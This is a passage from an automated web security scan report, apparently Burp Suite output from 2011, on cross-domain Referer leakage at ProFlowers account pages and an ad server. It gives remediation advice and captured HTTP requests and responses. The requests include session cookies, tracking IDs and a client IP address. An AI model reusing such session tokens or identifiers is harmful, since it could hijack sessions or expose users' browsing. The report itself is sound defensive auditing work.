class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">42K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_
...[SNIP]...

16. Cross-domain Referer leakage
There are 32 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


16.1. http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 1453
Content-Type: application/x-javascript
Last-Modified: Thu, 23 Sep 2010 20:40:54 GMT
Accept-Ranges: bytes
ETag: "b1f8519e5f5bcb1:33ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:09:21 GMT
Connection: close

// IF AGENTS ARE AVAILABLE:
function agents_available() {
   try {
       document.getElementById('smartbutton').style.display='block';
       document.getElementById('smartbutton').innerHTML = '<a href="" on
...[SNIP]...
er control.
   var scriptDiv = document.getElementById("advanceSmartButtonScript");
   if (scriptDiv != null)
   {
    if (scriptDiv.style.display =='block')
    {
scriptDiv.innerHTML = '<img src="https://admin.instantservice.com/resources/smartbutton/5526/21088/available.gif?'+Math.floor(Math.random()*10001)+'" style="width:0;height:0;visibility:hidden;position:absolute;" onLoad="agents_available()" onError="agents_not_available()">';
    }
   }
}

$().ready(function () {
   enableLiveChat();
});

16.2. http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 33609
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Mar 2011 23:33:29 GMT
Accept-Ranges: bytes
ETag: "3470badf32efcb1:33ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:09:20 GMT
Connection: close

PRVD.APP.UC.PersonalizationSelection = function (htmlElementID) {
   this.ElementID = htmlElementID;
   this.Element = document.getElementById(this.ElementID);
   this.OnPersonalizationSelectionChangedEv
...[SNIP]...
</div>" +
                   "<a href='http://www.adobe.com/go/getflashplayer/' target='_blank'><img src='http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif' alt='Get Adobe Flash player' /></a>
...[SNIP]...

16.3. https://accounts.proflowers.com/CustomerLogin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /CustomerLogin.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /CustomerLogin.aspx?Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: https://accounts.proflowers.com/Default.aspx?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=tjb3lzavlroebrfrqg11rbq2; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:32 GMT
Content-Length: 60636

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_common_old.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/>


<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a id="_PartnerHeader_UCHeaderPFC__homeLink" border="0" title="Go to ProFlowers Homepage" href="http://www.proflowers.com/Default.aspx?Ref=HomeNoRef"><img class="PFLogo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" style="border-width:0px;" /></a>
...[SNIP]...
<a rel="nofollow" class="radioLogo" href="http://www.proflowers.com/radio/default.aspx?Ref=HomeNoRef&amp;how=home" style="display:inline-block;height:90px;width:160px;"><img class="radio_icon" height="90px" width="160px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers on the Radio" style="border-width:0px;" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
CHeaderPFC_ctl117_submit2" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef" style="display:inline-block;height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<div class="consBanner746">
<img border="0" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//personalcreations/images/PRVD_746x60_6brands_1login.jpg" style="border-width:0px;" />
</div>
...[SNIP]...
<h2>Returning Customer:<img class="consIconTrans" border="0" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//proplants/images/PRVD_76x30_5brands_1login_onWhite.gif" style="border-width:0px;" /></h2>
...[SNIP]...
&#39;.proflowers.com&#39;, &#39;NTRAccountManagementBanner1&#39;, &#39;NFX&#39;, &#39;:&#39;, &#39;-&#39;, &#39;,&#39;);" href="http://www.netflix.com/?mqso=80026223&amp;trckid=PFAM1" target="_blank"><img id="ctl01_bannerbodycreative" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/NTR_AcctMgt_PFC_712_100.jpg" style="border-width:0px;" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"> <img class="Ribbon25Mil" border="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /> </div>
...[SNIP]...
lInput" type="text" value="Enter Your Email Here" id="ctl02_ctl02_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" href="http://www.proflowers.com/?Ref=HomeNoRef" style="display:inline-block;height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." style="border-width:0px;" /></a>
...[SNIP]...
selection of green and exotic plants, perfect for gift and home décor." border="0" rel="nofollow" href="http://www.proplants.com/?Ref=HomeNoRef" style="display:inline-block;height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home décor." style="border-width:0px;" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?Ref=HomeNoRef" style="display:inline-block;height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" style="border-width:0px;" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?Ref=HomeNoRef" style="display:inline-block;height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." style="border-width:0px;" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?Ref=HomeNoRef" style="display:inline-block;height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." style="border-width:0px;" /></a><a title="Unique personalized gifts for life's special occasions." border="0" href="http://www.personalcreations.com/?Ref=HomeNoRef" style="display:inline-block;height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life's special occasions." style="border-width:0px;" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?Ref=HomeNoRef" style="display:inline-block;height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

16.4. https://accounts.proflowers.com/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /Default.aspx

Issue detail

The page was loaded from a URL containing a query string: https://accounts.proflowers.com/Default.aspx?tile=hmpg_podA&Ref=HomeNoRef. The response contains links to other domains (the cross-domain src and href values in the response excerpt below). When the browser fetches those resources it sends the full page URL, query string included, as the Referer, so every value in the query string is disclosed to the third-party hosts; here the query carries only campaign tracking values (tile, Ref). The Referer is withheld only where the page is https and the resource is plain http, as with the http://a1128.g.akamai.net favicon link below; the https references to a248.e.akamai.net and cdn.mercent.com do receive it.

Request

GET /Default.aspx?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vkckynuy3ubxtgsnb1qqko4a; path=/; HttpOnly
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:13 GMT
Content-Length: 53696

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_common_old.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/>


<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a id="_PartnerHeader_UCHeaderPFC__homeLink" border="0" title="Go to ProFlowers Homepage" href="http://www.proflowers.com/Default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="PFLogo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" style="border-width:0px;" /></a>
...[SNIP]...
<a rel="nofollow" class="radioLogo" href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef&amp;how=home" style="display:inline-block;height:90px;width:160px;"><img class="radio_icon" height="90px" width="160px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers on the Radio" style="border-width:0px;" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
CHeaderPFC_ctl117_submit2" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef" style="display:inline-block;height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
&#39;.proflowers.com&#39;, &#39;NTRAccountManagementBanner1&#39;, &#39;NFX&#39;, &#39;:&#39;, &#39;-&#39;, &#39;,&#39;);" href="http://www.netflix.com/?mqso=80026223&amp;trckid=PFAM1" target="_blank"><img id="ctl00_bannerbodycreative" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/NTR_AcctMgt_PFC_712_100.jpg" style="border-width:0px;" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"> <img class="Ribbon25Mil" border="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /> </div>
...[SNIP]...
lInput" type="text" value="Enter Your Email Here" id="ctl01_ctl02_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" href="http://www.proflowers.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." style="border-width:0px;" /></a>
...[SNIP]...
and exotic plants, perfect for gift and home décor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home décor." style="border-width:0px;" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" style="border-width:0px;" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." style="border-width:0px;" /></a>
...[SNIP]...
t, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." style="border-width:0px;" /></a><a title="Unique personalized gifts for life’s special occasions." border="0" href="http://www.personalcreations.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life’s special occasions." style="border-width:0px;" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

16.5. http://adsfac.us/pct_mx.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /pct_mx.asp

Issue detail

The page was loaded from a URL containing a query string: http://adsfac.us/pct_mx.asp?L=305608&source=if. The response contains links to other domains: the pixel.quantserve.com and pix04.revsci.net tracking images in the response below, both of which receive this URL as the Referer when the browser loads them.

Request

GET /pct_mx.asp?L=305608&source=if HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
